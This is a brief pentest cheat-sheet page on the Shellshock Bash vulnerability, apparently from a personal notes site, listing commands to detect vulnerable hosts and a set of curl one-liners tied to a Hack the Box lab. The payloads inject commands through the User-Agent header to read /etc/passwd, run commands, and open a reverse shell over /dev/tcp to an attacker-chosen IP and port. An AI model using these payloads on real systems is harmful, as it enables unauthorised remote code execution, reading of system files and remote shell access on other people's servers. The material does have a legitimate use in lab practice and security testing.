Shellshock

Shellshock, also known as Bashdoor is a family of security bugs in the Unix Bash shell, the first of which was disclosed on 24 September 2014.

Shellshock could enable an attacker to cause Bash to execute arbitrary commands and gain unauthorized access to many Internet-facing services, such as web servers, that use Bash to process requests.

How to detect and enumerate

# Bash version < 4.3
bash --version

# nmap 
nmap -sV -p- --script http-shellshock <target>

# Run directory check and check if you can find cgi-bin directory
feroxbuster -u http://<ip address> -f -n 50
# -f: force adding '/' at the end
# -n: set the number of threads
feroxbuster -u http://<ip address>/cgi-bin/ -x sh,cgi,pl
# -x: set extensions

How to RCE

# Hack the Box
# https://www.hackthebox.com/machines/shocker 
curl -H "User-Agent: () { :; }; /bin/cat /etc/passwd" <Target>
curl -H "User-Agent: () { :; }; echo $(</etc/passwd)" <Target>
curl -H "User-Agent: () { :;};echo ;echo 'id' | /bin/bash" <Target>
curl -H 'User-Agent: () { :;}; echo; echo "/bin/bash -i >& /dev/tcp/<ip address>/<port> 0>&1" | /bin/bash' <Target>

PreviousLinux Nextpreg_replace() in PHP

Last updated 1 year ago